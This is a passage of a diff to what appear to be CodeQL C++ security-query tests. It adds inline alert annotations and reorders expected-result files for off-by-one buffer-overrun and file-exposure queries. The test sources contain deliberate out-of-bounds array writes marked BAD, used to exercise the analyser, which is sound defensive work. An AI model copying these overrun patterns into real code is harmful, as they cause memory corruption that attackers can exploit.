size | -| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:44:30:44:33 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:16:56:19 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:58:29:58:32 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:62:30:62:33 | size | size | -| test.cpp:83:14:83:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:83:14:83:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:82:31:82:34 | size | size | -| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:88:30:88:33 | size | size | -| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:92:31:92:34 | size | size | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.qlref index 8186dd0721b7..0bcfeb909556 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.qlref @@ -1 +1,2 @@ -experimental/Likely Bugs/ArrayAccessProductFlow.ql +query: experimental/Likely Bugs/ArrayAccessProductFlow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/test.cpp index 12fc89470649..552b9070a30b 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/test.cpp @@ -1,13 +1,13 @@ char *malloc(int size); void test1(int size) { - char *arr = malloc(size); + char *arr = malloc(size); // $ Source for (int i = 0; i < size; i++) { arr[i] = 0; // GOOD } for (int i = 0; i <= size; i++) { - arr[i] = i; // BAD + arr[i] = i; // BAD // $ Alert } } @@ -18,7 +18,7 @@ typedef struct { array_t mk_array(int size) { array_t arr; - arr.p = malloc(size); + arr.p = malloc(size); // $ Source arr.size = size; return arr; @@ -32,7 +32,7 @@ void test2(int size) { } for (int i = 0; i <= arr.size; i++) { - arr.p[i] = i; // BAD + arr.p[i] = i; // BAD // $ Alert } } @@ -42,7 +42,7 @@ void test3_callee(array_t arr) { } for (int i = 0; i <= arr.size; i++) { - arr.p[i] = i; // BAD + arr.p[i] = i; // BAD // $ Alert } } @@ -52,7 +52,7 @@ void test3(int size) { void test4(int size) { array_t arr; - arr.p = malloc(size); + arr.p = malloc(size); // $ Source arr.size = size; for (int i = 0; i < arr.size; i++) { @@ -60,13 +60,13 @@ void test4(int size) { } for (int i = 0; i <= arr.size; i++) { - arr.p[i] = i; // BAD + arr.p[i] = i; // BAD // $ Alert } } array_t *mk_array_p(int size) { array_t *arr = (array_t*) malloc(sizeof(array_t)); - arr->p = malloc(size); + arr->p = malloc(size); // $ Source arr->size = size; return arr; @@ -80,7 +80,7 @@ void test5(int size) { } for (int i = 0; i <= arr->size; i++) { - arr->p[i] = i; // BAD + arr->p[i] = i; // BAD // $ Alert } } @@ -90,7 +90,7 @@ void test6_callee(array_t *arr) { } for (int i = 0; i <= arr->size; i++) { - arr->p[i] = i; // BAD + arr->p[i] = i; // BAD // $ Alert } } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected index a4c154c06940..1aa7c546e12e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected @@ -1,3 +1,25 @@ +#select +| test.cpp:35:5:35:22 | PointerAdd: access to array | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:35:5:35:26 | Store: ... = ... | write | +| test.cpp:36:5:36:24 | PointerAdd: access to array | test.cpp:36:10:36:12 | buf | test.cpp:36:5:36:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:36:5:36:28 | Store: ... = ... | write | +| test.cpp:43:9:43:19 | PointerAdd: access to array | test.cpp:43:14:43:16 | buf | test.cpp:43:9:43:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:43:9:43:23 | Store: ... = ... | write | +| test.cpp:49:5:49:22 | PointerAdd: access to array | test.cpp:49:10:49:12 | buf | test.cpp:49:5:49:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:49:5:49:26 | Store: ... = ... | write | +| test.cpp:50:5:50:24 | PointerAdd: access to array | test.cpp:50:10:50:12 | buf | test.cpp:50:5:50:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:50:5:50:28 | Store: ... = ... | write | +| test.cpp:57:9:57:19 | PointerAdd: access to array | test.cpp:57:14:57:16 | buf | test.cpp:57:9:57:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:57:9:57:23 | Store: ... = ... | write | +| test.cpp:61:9:61:19 | PointerAdd: access to array | test.cpp:61:14:61:16 | buf | test.cpp:61:9:61:19 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:61:9:61:23 | Store: ... = ... | write | +| test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | +| test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | +| test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | +| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | +| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | +| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | +| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | +| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... | write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | edges | test.cpp:34:10:34:12 | buf | test.cpp:34:5:34:24 | access to array | provenance | Config | | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | provenance | Config | @@ -178,25 +200,3 @@ nodes | test.cpp:325:24:325:26 | end | semmle.label | end | | test.cpp:325:24:325:26 | end | semmle.label | end | subpaths -#select -| test.cpp:35:5:35:22 | PointerAdd: access to array | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:35:5:35:26 | Store: ... = ... | write | -| test.cpp:36:5:36:24 | PointerAdd: access to array | test.cpp:36:10:36:12 | buf | test.cpp:36:5:36:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:36:5:36:28 | Store: ... = ... | write | -| test.cpp:43:9:43:19 | PointerAdd: access to array | test.cpp:43:14:43:16 | buf | test.cpp:43:9:43:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:43:9:43:23 | Store: ... = ... | write | -| test.cpp:49:5:49:22 | PointerAdd: access to array | test.cpp:49:10:49:12 | buf | test.cpp:49:5:49:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:49:5:49:26 | Store: ... = ... | write | -| test.cpp:50:5:50:24 | PointerAdd: access to array | test.cpp:50:10:50:12 | buf | test.cpp:50:5:50:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:50:5:50:28 | Store: ... = ... | write | -| test.cpp:57:9:57:19 | PointerAdd: access to array | test.cpp:57:14:57:16 | buf | test.cpp:57:9:57:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:57:9:57:23 | Store: ... = ... | write | -| test.cpp:61:9:61:19 | PointerAdd: access to array | test.cpp:61:14:61:16 | buf | test.cpp:61:9:61:19 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:61:9:61:23 | Store: ... = ... | write | -| test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | -| test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | -| test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | -| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | -| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | -| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | -| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | -| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | -| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | -| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | -| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... | write | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.qlref index 082e8951c70d..3be7645c1a87 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-193/ConstantSizeArrayOffByOne.ql +query: experimental/Security/CWE/CWE-193/ConstantSizeArrayOffByOne.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/test.cpp index 03de927073a3..2c458170a51f 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/test.cpp @@ -32,60 +32,60 @@ void testOneArray(OneArray *arr) { void testBig(BigArray *arr) { arr->buf[MAX_SIZE-1] = 0; // GOOD - arr->buf[MAX_SIZE] = 0; // BAD - arr->buf[MAX_SIZE+1] = 0; // BAD + arr->buf[MAX_SIZE] = 0; // BAD // $ Alert + arr->buf[MAX_SIZE+1] = 0; // BAD // $ Alert for(int i = 0; i < MAX_SIZE; i++) { arr->buf[i] = 0; // GOOD } for(int i = 0; i <= MAX_SIZE; i++) { - arr->buf[i] = 0; // BAD + arr->buf[i] = 0; // BAD // $ Alert } } void testFields(ArrayAndFields *arr) { arr->buf[MAX_SIZE-1] = 0; // GOOD - arr->buf[MAX_SIZE] = 0; // BAD? - arr->buf[MAX_SIZE+1] = 0; // BAD? + arr->buf[MAX_SIZE] = 0; // BAD? // $ Alert + arr->buf[MAX_SIZE+1] = 0; // BAD? // $ Alert for(int i = 0; i < MAX_SIZE; i++) { arr->buf[i] = 0; // GOOD } for(int i = 0; i <= MAX_SIZE; i++) { - arr->buf[i] = 0; // BAD? + arr->buf[i] = 0; // BAD? // $ Alert } for(int i = 0; i < MAX_SIZE+2; i++) { - arr->buf[i] = 0; // BAD? + arr->buf[i] = 0; // BAD? // $ Alert } // is this different if it's a memcpy? } -void assignThroughPointer(int *p) { +void assignThroughPointer(int *p) { // $ Sink *p = 0; // ??? should the result go at a flow source? } void addToPointerAndAssign(int *p) { p[MAX_SIZE-1] = 0; // GOOD - p[MAX_SIZE] = 0; // BAD + p[MAX_SIZE] = 0; // BAD // $ Alert } void testInterproc(BigArray *arr) { assignThroughPointer(&arr->buf[MAX_SIZE-1]); // GOOD - assignThroughPointer(&arr->buf[MAX_SIZE]); // BAD + assignThroughPointer(&arr->buf[MAX_SIZE]); // BAD // $ Alert - addToPointerAndAssign(arr->buf); + addToPointerAndAssign(arr->buf); // $ Source } #define MAX_SIZE_BYTES 4096 void testCharIndex(BigArray *arr) { - char *charBuf = (char*) arr->buf; + char *charBuf = (char*) arr->buf; // $ Source charBuf[MAX_SIZE_BYTES - 1] = 0; // GOOD - charBuf[MAX_SIZE_BYTES] = 0; // BAD + charBuf[MAX_SIZE_BYTES] = 0; // BAD // $ Alert } void testEqRefinement() { @@ -125,7 +125,7 @@ void testStackAllocated() { char *arr[MAX_SIZE]; for(int i = 0; i <= MAX_SIZE; i++) { - arr[i] = 0; // BAD + arr[i] = 0; // BAD // $ Alert } } @@ -133,18 +133,18 @@ int strncmp(const char*, const char*, int); char testStrncmp2(char *arr) { if(strncmp(arr, "", 6) == 0) { - arr += 6; + arr += 6; // $ Alert } - return *arr; // GOOD [FALSE POSITIVE] + return *arr; // GOOD [FALSE POSITIVE] // $ Sink } void testStrncmp1() { char asdf[5]; - testStrncmp2(asdf); + testStrncmp2(asdf); // $ Source } void countdownBuf1(int **p) { - *--(*p) = 1; // GOOD [FALSE POSITIVE] + *--(*p) = 1; // GOOD [FALSE POSITIVE] // $ Sink *--(*p) = 2; // GOOD *--(*p) = 3; // GOOD *--(*p) = 4; // GOOD @@ -153,7 +153,7 @@ void countdownBuf1(int **p) { void countdownBuf2() { int buf[4]; - int *x = buf + 4; + int *x = buf + 4; // $ Alert countdownBuf1(&x); } @@ -215,10 +215,10 @@ int countdownLength2() { void pointer_size_larger_than_array_element_size() { unsigned char buffer[100]; // getByteSize() = 100 - int *ptr = (int *)buffer; // pai.getElementSize() will be sizeof(int) = 4 -> size = 25 + int *ptr = (int *)buffer; // pai.getElementSize() will be sizeof(int) = 4 -> size = 25 // $ Source ptr[24] = 0; // GOOD: writes bytes 96, 97, 98, 99 - ptr[25] = 0; // BAD: writes bytes 100, 101, 102, 103 + ptr[25] = 0; // BAD: writes bytes 100, 101, 102, 103 // $ Alert } struct vec2 { int x, y; }; @@ -226,10 +226,10 @@ struct vec3 { int x, y, z; }; void pointer_size_smaller_than_array_element_size_but_does_not_divide_it() { vec3 array[3]; // getByteSize() = 9 * sizeof(int) - vec2 *ptr = (vec2 *)array; // pai.getElementSize() will be 2 * sizeof(int) -> size = 4 + vec2 *ptr = (vec2 *)array; // pai.getElementSize() will be 2 * sizeof(int) -> size = 4 // $ Source ptr[3] = vec2{}; // GOOD: writes ints 6, 7 - ptr[4] = vec2{}; // BAD: writes ints 8, 9 + ptr[4] = vec2{}; // BAD: writes ints 8, 9 // $ Alert } void pointer_size_larger_than_array_element_size_and_does_not_divide_it() { @@ -258,7 +258,7 @@ void call_use(unsigned char* p, int n) { if(n == 3) { unsigned char x = p[0]; unsigned char y = p[1]; - unsigned char z = p[2]; // GOOD [FALSE POSITIVE]: `call_use(buffer2, 2)` won't reach this point. + unsigned char z = p[2]; // GOOD [FALSE POSITIVE]: `call_use(buffer2, 2)` won't reach this point. // $ Alert use(x, y, z); } } @@ -283,7 +283,7 @@ void test_call_use2() { call_call_use(buffer1,1); unsigned char buffer2[2]; - call_call_use(buffer2,2); + call_call_use(buffer2,2); // $ Source unsigned char buffer3[3]; call_call_use(buffer3,3); @@ -296,7 +296,7 @@ int guardingCallee(int *arr, int size) { int sum; for (int i = 0; i < size; i++) { - sum += arr[i]; // GOOD [FALSE POSITIVE] - guarded by size + sum += arr[i]; // GOOD [FALSE POSITIVE] - guarded by size // $ Alert } return sum; } @@ -306,7 +306,7 @@ int guardingCaller() { guardingCallee(arr1, MAX_SIZE); int arr2[10]; - guardingCallee(arr2, 10); + guardingCallee(arr2, 10); // $ Source } // simplified md5 padding @@ -319,10 +319,10 @@ void correlatedCondition(int num) { end = temp + 56; } else if (num < 64) { - end = temp + 64; // GOOD [FALSE POSITVE] + end = temp + 64; // GOOD [FALSE POSITVE] // $ Alert } char *temp2 = temp + num; - while(temp2 != end) { + while(temp2 != end) { // $ Sink *temp2 = 0; temp2++; } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/ExposureSensitiveInformationUnauthorizedActor.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/ExposureSensitiveInformationUnauthorizedActor.qlref index 0fa00ffe3abc..ff0854782f9d 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/ExposureSensitiveInformationUnauthorizedActor.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/ExposureSensitiveInformationUnauthorizedActor.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +query: experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/test.cpp index 6323d617ff13..a8df26ccae1e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/test.cpp @@ -9,7 +9,7 @@ int main(int argc, char *argv[]) { //umask(0022); FILE *fp; - fp = fopen("myFile.txt","w"); // BAD + fp = fopen("myFile.txt","w"); // BAD // $ Alert //chmod("myFile.txt",0644); fprintf(fp,"%s\n","data to file"); fclose(fp); diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test2/ExposureSensitiveInformationUnauthorizedActor.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test2/ExposureSensitiveInformationUnauthorizedActor.qlref index 0fa00ffe3abc..ff0854782f9d 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test2/ExposureSensitiveInformationUnauthorizedActor.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test2/ExposureSensitiveInformationUnauthorizedActor.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +query: experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test3/ExposureSensitiveInformationUnauthorizedActor.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test3/ExposureSensitiveInformationUnauthorizedActor.qlref index 0fa00ffe3abc..ff0854782f9d 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test3/ExposureSensitiveInformationUnauthorizedActor.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test3/ExposureSensitiveInformationUnauthorizedActor.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +query: experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/IncorrectChangingWorkingDirectory.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/IncorrectChangingWorkingDirectory.qlref index 6e5213404373..2689b2c1bc01 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/IncorrectChangingWorkingDirectory.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/IncorrectChangingWorkingDirectory.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-243/IncorrectChangingWorkingDirectory.ql +query: experimental/Security/CWE/CWE-243/IncorrectChangingWorkingDirectory.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/test.cpp index 24ff440d1400..5d5dddf6ef8c 100644 --- 